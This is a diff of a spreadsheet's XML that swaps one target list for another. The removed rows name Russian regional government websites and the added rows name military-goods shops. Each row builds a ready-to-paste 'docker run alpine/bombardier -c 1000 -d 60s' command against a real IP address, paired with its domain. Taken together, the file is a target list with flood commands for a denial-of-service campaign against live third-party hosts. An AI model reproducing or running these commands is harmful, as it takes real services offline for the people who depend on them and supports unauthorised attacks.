+      <c r="C80" s="2"/>
       <c r="D80" s="3"/>
       <c r="E80" s="3"/>
     </row>
     <row r="81" ht="15.35" customHeight="1">
-      <c r="A81" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B81&amp;"&amp;&amp; sleep 5;"</f>
-        <v>187</v>
-      </c>
-      <c r="B81" t="s" s="8">
-        <v>188</v>
-      </c>
-      <c r="C81" t="s" s="2">
-        <v>189</v>
-      </c>
+      <c r="A81" s="2"/>
+      <c r="B81" s="8"/>
+      <c r="C81" s="2"/>
       <c r="D81" s="3"/>
       <c r="E81" s="3"/>
     </row>
     <row r="82" ht="15.35" customHeight="1">
-      <c r="A82" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B82&amp;"&amp;&amp; sleep 5;"</f>
-        <v>190</v>
-      </c>
-      <c r="B82" t="s" s="8">
-        <v>191</v>
-      </c>
-      <c r="C82" t="s" s="2">
-        <v>192</v>
-      </c>
+      <c r="A82" s="2"/>
+      <c r="B82" s="8"/>
+      <c r="C82" s="2"/>
       <c r="D82" s="3"/>
       <c r="E82" s="3"/>
     </row>
     <row r="83" ht="15.35" customHeight="1">
-      <c r="A83" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B83&amp;"&amp;&amp; sleep 5;"</f>
-        <v>193</v>
-      </c>
-      <c r="B83" t="s" s="8">
-        <v>194</v>
-      </c>
-      <c r="C83" t="s" s="2">
-        <v>192</v>
-      </c>
+      <c r="A83" s="2"/>
+      <c r="B83" s="8"/>
+      <c r="C83" s="2"/>
       <c r="D83" s="3"/>
       <c r="E83" s="3"/>
     </row>
     <row r="84" ht="15.35" customHeight="1">
-      <c r="A84" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B84&amp;"&amp;&amp; sleep 5;"</f>
-        <v>195</v>
-      </c>
-      <c r="B84" t="s" s="8">
-        <v>196</v>
-      </c>
-      <c r="C84" t="s" s="2">
-        <v>192</v>
-      </c>
+      <c r="A84" s="2"/>
+      <c r="B84" s="8"/>
+      <c r="C84" s="2"/>
       <c r="D84" s="3"/>
       <c r="E84" s="3"/>
     </row>
     <row r="85" ht="15.35" customHeight="1">
-      <c r="A85" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B85&amp;"&amp;&amp; sleep 5;"</f>
-        <v>197</v>
-      </c>
-      <c r="B85" t="s" s="8">
-        <v>198</v>
-      </c>
-      <c r="C85" t="s" s="2">
-        <v>192</v>
-      </c>
+      <c r="A85" s="2"/>
+      <c r="B85" s="8"/>
+      <c r="C85" s="2"/>
       <c r="D85" s="3"/>
       <c r="E85" s="3"/>
     </row>
     <row r="86" ht="15.35" customHeight="1">
-      <c r="A86" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B86&amp;"&amp;&amp; sleep 5;"</f>
-        <v>199</v>
-      </c>
-      <c r="B86" t="s" s="8">
-        <v>200</v>
-      </c>
-      <c r="C86" t="s" s="2">
-        <v>192</v>
-      </c>
+      <c r="A86" s="2"/>
+      <c r="B86" s="8"/>
+      <c r="C86" s="2"/>
       <c r="D86" s="3"/>
       <c r="E86" s="3"/>
     </row>
     <row r="87" ht="15.35" customHeight="1">
-      <c r="A87" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B87&amp;"&amp;&amp; sleep 5;"</f>
-        <v>201</v>
-      </c>
-      <c r="B87" t="s" s="8">
-        <v>202</v>
-      </c>
-      <c r="C87" t="s" s="2">
-        <v>203</v>
-      </c>
+      <c r="A87" s="2"/>
+      <c r="B87" s="8"/>
+      <c r="C87" s="2"/>
       <c r="D87" s="3"/>
       <c r="E87" s="3"/>
     </row>
     <row r="88" ht="15.35" customHeight="1">
-      <c r="A88" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B88&amp;"&amp;&amp; sleep 5;"</f>
-        <v>204</v>
-      </c>
-      <c r="B88" t="s" s="8">
-        <v>205</v>
-      </c>
-      <c r="C88" t="s" s="2">
-        <v>206</v>
-      </c>
+      <c r="A88" s="2"/>
+      <c r="B88" s="8"/>
+      <c r="C88" s="2"/>
       <c r="D88" s="2"/>
       <c r="E88" s="3"/>
     </row>
     <row r="89" ht="15.35" customHeight="1">
-      <c r="A89" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B89&amp;"&amp;&amp; sleep 5;"</f>
-        <v>207</v>
-      </c>
-      <c r="B89" t="s" s="8">
-        <v>208</v>
-      </c>
-      <c r="C89" t="s" s="2">
-        <v>209</v>
-      </c>
+      <c r="A89" s="2"/>
+      <c r="B89" s="8"/>
+      <c r="C89" s="2"/>
       <c r="D89" s="4"/>
       <c r="E89" s="3"/>
     </row>
     <row r="90" ht="15.35" customHeight="1">
-      <c r="A90" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B90&amp;"&amp;&amp; sleep 5;"</f>
-        <v>210</v>
-      </c>
-      <c r="B90" t="s" s="8">
-        <v>211</v>
-      </c>
-      <c r="C90" t="s" s="2">
-        <v>209</v>
-      </c>
+      <c r="A90" s="2"/>
+      <c r="B90" s="8"/>
+      <c r="C90" s="2"/>
       <c r="D90" s="6"/>
       <c r="E90" s="3"/>
     </row>
     <row r="91" ht="15.35" customHeight="1">
-      <c r="A91" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B91&amp;"&amp;&amp; sleep 5;"</f>
-        <v>212</v>
-      </c>
-      <c r="B91" t="s" s="8">
-        <v>213</v>
-      </c>
-      <c r="C91" t="s" s="2">
-        <v>214</v>
-      </c>
+      <c r="A91" s="2"/>
+      <c r="B91" s="8"/>
+      <c r="C91" s="2"/>
       <c r="D91" s="6"/>
       <c r="E91" s="3"/>
     </row>
     <row r="92" ht="16" customHeight="1">
-      <c r="A92" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B92&amp;"&amp;&amp; sleep 5;"</f>
-        <v>215</v>
-      </c>
-      <c r="B92" t="s" s="8">
-        <v>216</v>
-      </c>
-      <c r="C92" t="s" s="2">
-        <v>217</v>
-      </c>
+      <c r="A92" s="2"/>
+      <c r="B92" s="8"/>
+      <c r="C92" s="2"/>
       <c r="D92" s="6"/>
       <c r="E92" s="3"/>
     </row>
     <row r="93" ht="16" customHeight="1">
-      <c r="A93" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B93&amp;"&amp;&amp; sleep 5;"</f>
-        <v>218</v>
-      </c>
-      <c r="B93" t="s" s="8">
-        <v>219</v>
-      </c>
-      <c r="C93" t="s" s="2">
-        <v>217</v>
-      </c>
+      <c r="A93" s="2"/>
+      <c r="B93" s="8"/>
+      <c r="C93" s="2"/>
       <c r="D93" s="6"/>
       <c r="E93" s="3"/>
     </row>
     <row r="94" ht="16" customHeight="1">
-      <c r="A94" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B94&amp;"&amp;&amp; sleep 5;"</f>
-        <v>220</v>
-      </c>
-      <c r="B94" t="s" s="8">
-        <v>221</v>
-      </c>
-      <c r="C94" t="s" s="2">
-        <v>217</v>
-      </c>
+      <c r="A94" s="2"/>
+      <c r="B94" s="8"/>
+      <c r="C94" s="2"/>
       <c r="D94" s="6"/>
       <c r="E94" s="3"/>
     </row>
     <row r="95" ht="15" customHeight="1">
-      <c r="A95" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B95&amp;"&amp;&amp; sleep 5;"</f>
-        <v>218</v>
-      </c>
-      <c r="B95" t="s" s="8">
-        <v>219</v>
-      </c>
-      <c r="C95" t="s" s="2">
-        <v>222</v>
-      </c>
+      <c r="A95" s="2"/>
+      <c r="B95" s="8"/>
+      <c r="C95" s="2"/>
       <c r="D95" s="6"/>
       <c r="E95" s="3"/>
     </row>
     <row r="96" ht="15.35" customHeight="1">
-      <c r="A96" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B96&amp;"&amp;&amp; sleep 5;"</f>
-        <v>220</v>
-      </c>
-      <c r="B96" t="s" s="8">
-        <v>221</v>
-      </c>
-      <c r="C96" t="s" s="2">
-        <v>222</v>
-      </c>
+      <c r="A96" s="2"/>
+      <c r="B96" s="8"/>
+      <c r="C96" s="2"/>
       <c r="D96" s="6"/>
       <c r="E96" s="3"/>
     </row>
     <row r="97" ht="15.35" customHeight="1">
-      <c r="A97" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B97&amp;"&amp;&amp; sleep 5;"</f>
-        <v>223</v>
-      </c>
-      <c r="B97" t="s" s="8">
-        <v>224</v>
-      </c>
-      <c r="C97" t="s" s="2">
-        <v>222</v>
-      </c>
+      <c r="A97" s="2"/>
+      <c r="B97" s="8"/>
+      <c r="C97" s="2"/>
       <c r="D97" s="6"/>
       <c r="E97" s="3"/>
     </row>
     <row r="98" ht="15.35" customHeight="1">
-      <c r="A98" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B98&amp;"&amp;&amp; sleep 5;"</f>
-        <v>225</v>
-      </c>
-      <c r="B98" t="s" s="8">
-        <v>226</v>
-      </c>
-      <c r="C98" t="s" s="2">
-        <v>227</v>
-      </c>
+      <c r="A98" s="2"/>
+      <c r="B98" s="8"/>
+      <c r="C98" s="2"/>
       <c r="D98" s="6"/>
       <c r="E98" s="3"/>
     </row>
     <row r="99" ht="15.35" customHeight="1">
-      <c r="A99" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B99&amp;"&amp;&amp; sleep 5;"</f>
-        <v>228</v>
-      </c>
-      <c r="B99" t="s" s="8">
-        <v>229</v>
-      </c>
-      <c r="C99" t="s" s="2">
-        <v>227</v>
-      </c>
+      <c r="A99" s="2"/>
+      <c r="B99" s="8"/>
+      <c r="C99" s="2"/>
       <c r="D99" s="6"/>
       <c r="E99" s="3"/>
     </row>
     <row r="100" ht="15.35" customHeight="1">
-      <c r="A100" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B100&amp;"&amp;&amp; sleep 5;"</f>
-        <v>230</v>
-      </c>
-      <c r="B100" t="s" s="8">
-        <v>231</v>
-      </c>
-      <c r="C100" t="s" s="2">
-        <v>227</v>
-      </c>
+      <c r="A100" s="2"/>
+      <c r="B100" s="8"/>
+      <c r="C100" s="2"/>
       <c r="D100" s="6"/>
       <c r="E100" s="3"/>
     </row>
     <row r="101" ht="15.35" customHeight="1">
-      <c r="A101" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B101&amp;"&amp;&amp; sleep 5;"</f>
-        <v>232</v>
-      </c>
-      <c r="B101" t="s" s="8">
-        <v>233</v>
-      </c>
-      <c r="C101" t="s" s="2">
-        <v>227</v>
-      </c>
+      <c r="A101" s="2"/>
+      <c r="B101" s="8"/>
+      <c r="C101" s="2"/>
       <c r="D101" s="6"/>
       <c r="E101" s="3"/>
     </row>

--- a/test.xlsx
+++ b/test.xlsx
@@ -11,255 +11,125 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="83">
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 84.42.45.126 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>84.42.45.126</t>
-  </si>
-  <si>
-    <t>www.rabota-bryanskobl.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 84.42.56.189 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>84.42.56.189</t>
-  </si>
-  <si>
-    <t>brkmed.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.183.45.148 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>213.183.45.148</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 89.249.48.44 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>89.249.48.44</t>
-  </si>
-  <si>
-    <t>econom32.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 5.23.50.50 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>5.23.50.50</t>
-  </si>
-  <si>
-    <t>depbez.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 89.223.123.233 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>89.223.123.233</t>
-  </si>
-  <si>
-    <t>bga32.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.107.66.166 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>91.107.66.166</t>
-  </si>
-  <si>
-    <t>git32.rostrud.gov.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 84.42.56.82 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>84.42.56.82</t>
-  </si>
-  <si>
-    <t>www.uszn032.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 87.236.16.248 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>87.236.16.248</t>
-  </si>
-  <si>
-    <t>archive-bryansk.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.199.149.231 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>91.199.149.231</t>
-  </si>
-  <si>
-    <t>gzhi32.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.215.189.14 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>91.215.189.14</t>
-  </si>
-  <si>
-    <t>tender32.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.161.52.80 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.161.52.80</t>
-  </si>
-  <si>
-    <t>pfr.gov.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.164.138.171 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>212.164.138.171</t>
-  </si>
-  <si>
-    <t>kursk.arbitr.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.164.138.173 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>212.164.138.173</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.164.138.175 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>212.164.138.175</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 95.173.157.58 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>95.173.157.58</t>
-  </si>
-  <si>
-    <t>kursk.roskazna.gov.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.31.198.239 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>31.31.198.239</t>
-  </si>
-  <si>
-    <t>kurskzags.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.183.175.240 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.183.175.240</t>
-  </si>
-  <si>
-    <t>archive.rkursk.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 81.176.228.4 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>81.176.228.4</t>
-  </si>
-  <si>
-    <t>ksp-kursk.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.93.165.130 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.93.165.130</t>
-  </si>
-  <si>
-    <t>tarifkursk.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.123.195.14 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.123.195.14</t>
-  </si>
-  <si>
-    <t>gzhi-kursk.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.31.196.200 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>31.31.196.200</t>
-  </si>
-  <si>
-    <t>ksokursk.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 81.177.24.64 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>81.177.24.64</t>
-  </si>
-  <si>
-    <t>komobr46.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 77.243.9.162 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>77.243.9.162</t>
-  </si>
-  <si>
-    <t>imkursk.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.192.1.54 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>176.192.1.54</t>
-  </si>
-  <si>
-    <t>kurskduma.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 87.236.16.254 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>87.236.16.254</t>
-  </si>
-  <si>
-    <t>горсобрание-курск.рф</t>
-  </si>
-  <si>
-    <t>git46.rostrud.gov.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.193.84.148 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>85.193.84.148</t>
-  </si>
-  <si>
-    <t>kursk.ru</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 82.202.228.148 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>82.202.228.148</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.184.208.125 &amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>31.184.208.125</t>
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="21">
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.31.196.235 &amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>31.31.196.235</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <u val="single"/>
+        <sz val="11"/>
+        <color indexed="11"/>
+        <rFont val="Arial"/>
+      </rPr>
+      <t>военсбыт.рф</t>
+    </r>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.208.1.102 &amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.208.1.102</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <u val="single"/>
+        <sz val="11"/>
+        <color indexed="11"/>
+        <rFont val="Arial"/>
+      </rPr>
+      <t>www.voentorg-moscow.ru</t>
+    </r>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.127.241.214 &amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>188.127.241.214</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <u val="single"/>
+        <sz val="11"/>
+        <color indexed="11"/>
+        <rFont val="Arial"/>
+      </rPr>
+      <t>hakki.ru</t>
+    </r>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 95.183.14.26 &amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>95.183.14.26</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <u val="single"/>
+        <sz val="11"/>
+        <color indexed="11"/>
+        <rFont val="Arial"/>
+      </rPr>
+      <t>militarka.com</t>
+    </r>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.170.244.247  &amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t xml:space="preserve">178.170.244.247 </t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <u val="single"/>
+        <sz val="11"/>
+        <color indexed="11"/>
+        <rFont val="Arial"/>
+      </rPr>
+      <t>voentorg-sklad.ru</t>
+    </r>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 84.252.141.29 &amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>84.252.141.29</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <u val="single"/>
+        <sz val="11"/>
+        <color indexed="11"/>
+        <rFont val="Arial"/>
+      </rPr>
+      <t>voen-torg.ru</t>
+    </r>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 79.137.210.66 &amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>79.137.210.66</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <u val="single"/>
+        <sz val="11"/>
+        <color indexed="11"/>
+        <rFont val="Arial"/>
+      </rPr>
+      <t>voentorg-2.ru</t>
+    </r>
   </si>
 </sst>
 </file>
@@ -269,7 +139,7 @@
   <numFmts count="1">
     <numFmt numFmtId="0" formatCode="General"/>
   </numFmts>
-  <fonts count="3">
+  <fonts count="4">
     <font>
       <sz val="11"/>
       <color indexed="8"/>
@@ -285,13 +155,25 @@
       <color indexed="8"/>
       <name val="Calibri"/>
     </font>
+    <font>
+      <u val="single"/>
+      <sz val="11"/>
+      <color indexed="11"/>
+      <name val="Arial"/>
+    </font>
   </fonts>
-  <fills count="2">
+  <fills count="3">
     <fill>
       <patternFill patternType="none"/>
     </fill>
     <fill>
       <patternFill patternType="gray125"/>
+    </fill>
+    <fill>
+      <patternFill patternType="solid">
+        <fgColor indexed="9"/>
+        <bgColor auto="1"/>
+      </patternFill>
     </fill>
   </fills>
   <borders count="2">
@@ -304,16 +186,16 @@
     </border>
     <border>
       <left style="thin">
-        <color indexed="9"/>
+        <color indexed="10"/>
       </left>
       <right style="thin">
-        <color indexed="9"/>
+        <color indexed="10"/>
       </right>
       <top style="thin">
-        <color indexed="9"/>
+        <color indexed="10"/>
       </top>
       <bottom style="thin">
-        <color indexed="9"/>
+        <color indexed="10"/>
       </bottom>
       <diagonal/>
     </border>
@@ -330,10 +212,10 @@
     <xf numFmtId="0" fontId="0" applyNumberFormat="1" applyFont="1" applyFill="0" applyBorder="0" applyAlignment="1" applyProtection="0">
       <alignment vertical="bottom"/>
     </xf>
-    <xf numFmtId="49" fontId="0" borderId="1" applyNumberFormat="1" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1" applyProtection="0">
+    <xf numFmtId="49" fontId="0" fillId="2" borderId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="0">
       <alignment vertical="bottom"/>
     </xf>
-    <xf numFmtId="0" fontId="0" borderId="1" applyNumberFormat="0" applyFont="1" applyFill="0" applyBorder="1" applyAlignment="1" applyProtection="0">
+    <xf numFmtId="0" fontId="0" fillId="2" borderId="1" applyNumberFormat="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="0">
       <alignment vertical="bottom"/>
     </xf>
   </cellXfs>
@@ -353,7 +235,9 @@
       <rgbColor rgb="ffff00ff"/>
       <rgbColor rgb="ff00ffff"/>
       <rgbColor rgb="ff000000"/>
+      <rgbColor rgb="ffffffff"/>
       <rgbColor rgb="ffaaaaaa"/>
+      <rgbColor rgb="ff0000ff"/>
     </indexedColors>
   </colors>
 </styleSheet>
@@ -491,13 +375,7 @@
           <a:effectLst/>
         </a:effectStyle>
         <a:effectStyle>
-          <a:effectLst>
-            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="20000" dir="5400000">
-              <a:srgbClr val="000000">
-                <a:alpha val="38000"/>
-              </a:srgbClr>
-            </a:outerShdw>
-          </a:effectLst>
+          <a:effectLst/>
         </a:effectStyle>
       </a:effectStyleLst>
       <a:bgFillStyleLst>
@@ -596,10 +474,10 @@
             </a:solidFill>
             <a:effectLst/>
             <a:uFillTx/>
-            <a:latin typeface="Cambria"/>
-            <a:ea typeface="Cambria"/>
-            <a:cs typeface="Cambria"/>
-            <a:sym typeface="Cambria"/>
+            <a:latin typeface="+mn-lt"/>
+            <a:ea typeface="+mn-ea"/>
+            <a:cs typeface="+mn-cs"/>
+            <a:sym typeface="Helvetica Neue"/>
           </a:defRPr>
         </a:defPPr>
         <a:lvl1pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" fontAlgn="auto" latinLnBrk="1" hangingPunct="0">
@@ -854,13 +732,7 @@
           <a:prstDash val="solid"/>
           <a:round/>
         </a:ln>
-        <a:effectLst>
-          <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="20000" dir="5400000">
-            <a:srgbClr val="000000">
-              <a:alpha val="38000"/>
-            </a:srgbClr>
-          </a:outerShdw>
-        </a:effectLst>
+        <a:effectLst/>
         <a:sp3d/>
       </a:spPr>
       <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91439" tIns="45719" rIns="91439" bIns="45719" numCol="1" spcCol="38100" rtlCol="0" anchor="t" upright="0">
@@ -1173,10 +1045,10 @@
             </a:solidFill>
             <a:effectLst/>
             <a:uFillTx/>
-            <a:latin typeface="Cambria"/>
-            <a:ea typeface="Cambria"/>
-            <a:cs typeface="Cambria"/>
-            <a:sym typeface="Cambria"/>
+            <a:latin typeface="+mn-lt"/>
+            <a:ea typeface="+mn-ea"/>
+            <a:cs typeface="+mn-cs"/>
+            <a:sym typeface="Helvetica Neue"/>
           </a:defRPr>
         </a:defPPr>
         <a:lvl1pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" fontAlgn="auto" latinLnBrk="1" hangingPunct="0">
@@ -1477,7 +1349,7 @@
         <v>7</v>
       </c>
       <c r="C3" t="s" s="2">
-        <v>5</v>
+        <v>8</v>
       </c>
       <c r="D3" s="3"/>
       <c r="E3" s="3"/>
@@ -1485,13 +1357,13 @@
     <row r="4" ht="14.6" customHeight="1">
       <c r="A4" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B4&amp;" &amp;&amp; sleep 5;"</f>
-        <v>8</v>
+        <v>9</v>
       </c>
       <c r="B4" t="s" s="2">
-        <v>9</v>
+        <v>10</v>
       </c>
       <c r="C4" t="s" s="2">
-        <v>10</v>
+        <v>11</v>
       </c>
       <c r="D4" s="3"/>
       <c r="E4" s="3"/>
@@ -1499,13 +1371,13 @@
     <row r="5" ht="14.6" customHeight="1">
       <c r="A5" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B5&amp;" &amp;&amp; sleep 5;"</f>
-        <v>11</v>
+        <v>12</v>
       </c>
       <c r="B5" t="s" s="2">
-        <v>12</v>
+        <v>13</v>
       </c>
       <c r="C5" t="s" s="2">
-        <v>13</v>
+        <v>14</v>
       </c>
       <c r="D5" s="3"/>
       <c r="E5" s="3"/>
@@ -1513,13 +1385,13 @@
     <row r="6" ht="14.6" customHeight="1">
       <c r="A6" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B6&amp;" &amp;&amp; sleep 5;"</f>
-        <v>14</v>
+        <v>15</v>
       </c>
       <c r="B6" t="s" s="2">
-        <v>15</v>
+        <v>16</v>
       </c>
       <c r="C6" t="s" s="2">
-        <v>16</v>
+        <v>17</v>
       </c>
       <c r="D6" s="3"/>
       <c r="E6" s="3"/>
@@ -1527,336 +1399,175 @@
     <row r="7" ht="14.6" customHeight="1">
       <c r="A7" t="s" s="2">
         <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B7&amp;" &amp;&amp; sleep 5;"</f>
-        <v>17</v>
+        <v>18</v>
       </c>
       <c r="B7" t="s" s="2">
-        <v>18</v>
+        <v>19</v>
       </c>
       <c r="C7" t="s" s="2">
-        <v>19</v>
+        <v>20</v>
       </c>
       <c r="D7" s="3"/>
       <c r="E7" s="3"/>
     </row>
     <row r="8" ht="14.6" customHeight="1">
-      <c r="A8" t="s" s="2">
-        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;$B8&amp;" &amp;&amp; sleep 5;"</f>
-        <v>20</v>
-      </c>
-      <c r="B8" t="s" s="2">
-        <v>21</v>
-      </c>
-      <c r="C8" t="s" s="2">
-        <v>22</v>
-      </c>
+      <c r="A8" s="2"/>
+      <c r="B8" s="2"/>
+      <c r="C8" s="2"/>
       <c r="D8" s="3"/>
       <c r="E8" s="3"/>
     </row>
